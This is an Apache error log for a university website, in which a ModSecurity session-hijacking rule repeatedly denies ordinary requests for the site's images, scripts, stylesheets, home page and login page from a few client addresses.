[Mon Aug 28 08:13:51.456447 2023] [:error] [pid 37539] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv0z8Co-f0AAJKjaB4AAAAG"]
[Mon Aug 28 08:13:51.467484 2023] [:error] [pid 38150] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv0z8Co-f0AAJUGIYMAAAAC"]
[Mon Aug 28 08:13:51.477628 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv0z8Co-f0AAJSxY2IAAAAH"]
[Mon Aug 28 08:13:51.487557 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv0z8Co-f0AAJOr9-MAAAAL"]
[Mon Aug 28 08:13:51.512649 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv0z8Co-f0AAJWfZK8AAAAI"]
[Mon Aug 28 08:13:51.524869 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv0z8Co-f0AAJTineAAAAAE"]
[Mon Aug 28 08:13:51.535795 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv0z8Co-f0AAJSxY2MAAAAH"]
[Mon Aug 28 08:13:51.548757 2023] [:error] [pid 38150] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv0z8Co-f0AAJUGIYQAAAAC"]
[Mon Aug 28 08:13:51.558706 2023] [:error] [pid 38339] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv0z8Co-f0AAJXDU2oAAAAK"]
[Mon Aug 28 08:13:51.571553 2023] [:error] [pid 37539] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv0z8Co-f0AAJKjaB8AAAAG"]
[Mon Aug 28 08:13:51.581122 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv0z8Co-f0AAJTineEAAAAE"]
[Mon Aug 28 08:13:51.594988 2023] [:error] [pid 38340] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv0z8Co-f0AAJXEm@QAAAAM"]
[Mon Aug 28 08:13:51.610898 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv0z8Co-f0AAJWfZLAAAAAI"]
[Mon Aug 28 08:13:51.635072 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv0z8Co-f0AAJXCvogAAAAJ"]
[Mon Aug 28 08:13:51.695180 2023] [:error] [pid 38340] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv0z8Co-f0AAJXEm@UAAAAM"]
[Mon Aug 28 08:14:08.997422 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04MCo-f0AAJOr9-cAAAAL"]
[Mon Aug 28 08:14:09.061564 2023] [:error] [pid 37539] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv04cCo-f0AAJKjaCMAAAAG"]
[Mon Aug 28 08:14:10.026856 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04sCo-f0AAJTineYAAAAE"]
[Mon Aug 28 08:14:10.263517 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04sCo-f0AAJXCvowAAAAJ"]
[Mon Aug 28 08:14:10.559457 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04sCo-f0AAJOr9-gAAAAL"]
[Mon Aug 28 08:14:10.743372 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04sCo-f0AAJSr2xYAAAAO"]
[Mon Aug 28 08:14:10.885005 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04sCo-f0AAJWfZLMAAAAI"]
[Mon Aug 28 08:14:11.043263 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv048Co-f0AAJOr9-kAAAAL"]
[Mon Aug 28 08:14:11.227574 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv048Co-f0AAJSr2xcAAAAO"]
[Mon Aug 28 08:14:11.527978 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv048Co-f0AAJS7R8IAAAAB"]
[Mon Aug 28 08:14:13.113199 2023] [:error] [pid 38339] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv05cCo-f0AAJXDU3AAAAAK"]
[Mon Aug 28 08:14:14.987636 2023] [:error] [pid 38150] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv05sCo-f0AAJUGIYkAAAAC"]
[Mon Aug 28 08:14:31.729181 2023] [:error] [pid 38065] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv098Co-f0AAJSxY28AAAAH"]
[Mon Aug 28 08:14:31.742704 2023] [:error] [pid 38059] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv098Co-f0AAJSr2x0AAAAO"]
[Mon Aug 28 08:14:31.748986 2023] [:error] [pid 38149] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv098Co-f0AAJUFNVwAAAAA"]
[Mon Aug 28 08:14:31.752836 2023] [:error] [pid 38338] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv098Co-f0AAJXCvpIAAAAJ"]
[Mon Aug 28 08:14:31.770666 2023] [:error] [pid 38150] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv098Co-f0AAJUGIYwAAAAC"]
[Mon Aug 28 08:14:31.795619 2023] [:error] [pid 38114] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv098Co-f0AAJTinesAAAAE"]
[Mon Aug 28 08:14:31.801355 2023] [:error] [pid 38065] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv098Co-f0AAJSxY3AAAAAH"]
[Mon Aug 28 08:14:31.848300 2023] [:error] [pid 37803] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv098Co-f0AAJOr9-4AAAAL"]
[Mon Aug 28 08:14:31.848340 2023] [:error] [pid 38149] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv098Co-f0AAJUFNV0AAAAA"]
[Mon Aug 28 08:14:31.850460 2023] [:error] [pid 38114] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv098Co-f0AAJTinewAAAAE"]
[Mon Aug 28 08:14:31.852219 2023] [:error] [pid 38065] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv098Co-f0AAJSxY3EAAAAH"]
[Mon Aug 28 08:14:31.904612 2023] [:error] [pid 38150] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv098Co-f0AAJUGIY0AAAAC"]
[Mon Aug 28 08:14:31.905091 2023] [:error] [pid 38114] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv098Co-f0AAJTine0AAAAE"]
[Mon Aug 28 08:14:31.932632 2023] [:error] [pid 37803] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv098Co-f0AAJOr9-8AAAAL"]
[Mon Aug 28 08:14:31.952367 2023] [:error] [pid 38059] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv098Co-f0AAJSr2x4AAAAO"]
[Mon Aug 28 08:14:31.954490 2023] [:error] [pid 38065] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv098Co-f0AAJSxY3IAAAAH"]
[Mon Aug 28 08:14:31.960653 2023] [:error] [pid 38338] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv098Co-f0AAJXCvpMAAAAJ"]
[Mon Aug 28 08:14:32.007404 2023] [:error] [pid 38150] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv0@MCo-f0AAJUGIY4AAAAC"]
[Mon Aug 28 08:14:32.011160 2023] [:error] [pid 38149] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv0@MCo-f0AAJUFNV4AAAAA"]
[Mon Aug 28 08:14:32.020049 2023] [:error] [pid 38339] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv0@MCo-f0AAJXDU3QAAAAK"]
[Mon Aug 28 08:14:32.049619 2023] [:error] [pid 37803] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff2"] [unique_id "ZOv0@MCo-f0AAJOr@AAAAAAL"]
[Mon Aug 28 08:14:32.061399 2023] [:error] [pid 38059] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv0@MCo-f0AAJSr2x8AAAAO"]
[Mon Aug 28 08:14:32.151516 2023] [:error] [pid 38114] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv0@MCo-f0AAJTine4AAAAE"]
[Mon Aug 28 08:14:32.195538 2023] [:error] [pid 38339] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff"] [unique_id "ZOv0@MCo-f0AAJXDU3UAAAAK"]
[Mon Aug 28 08:14:32.268295 2023] [:error] [pid 38150] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.ttf"] [unique_id "ZOv0@MCo-f0AAJUGIY8AAAAC"]
[Mon Aug 28 08:14:32.409525 2023] [:error] [pid 38059] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv0@MCo-f0AAJSr2yAAAAAO"]
[Mon Aug 28 08:14:45.237028 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv1BcCo-f0AAJTinfEAAAAE"]
[Mon Aug 28 08:15:17.861739 2023] [:error] [pid 38114] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv1JcCo-f0AAJTinfgAAAAE"]
[Mon Aug 28 08:15:17.866752 2023] [:error] [pid 37803] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv1JcCo-f0AAJOr@AcAAAAL"]
[Mon Aug 28 08:15:17.871712 2023] [:error] [pid 37539] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv1JcCo-f0AAJKjaDEAAAAG"]
[Mon Aug 28 08:15:18.443393 2023] [:error] [pid 38149] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv1JsCo-f0AAJUFNWoAAAAA"]
[Mon Aug 28 08:15:18.499175 2023] [:error] [pid 38303] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv1JsCo-f0AAJWfZMAAAAAI"]
[Mon Aug 28 08:15:18.507278 2023] [:error] [pid 37803] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv1JsCo-f0AAJOr@AgAAAAL"]
[Mon Aug 28 08:15:18.512393 2023] [:error] [pid 38150] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv1JsCo-f0AAJUGIZkAAAAC"]
[Mon Aug 28 08:15:18.516194 2023] [:error] [pid 38114] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv1JsCo-f0AAJTinfkAAAAE"]
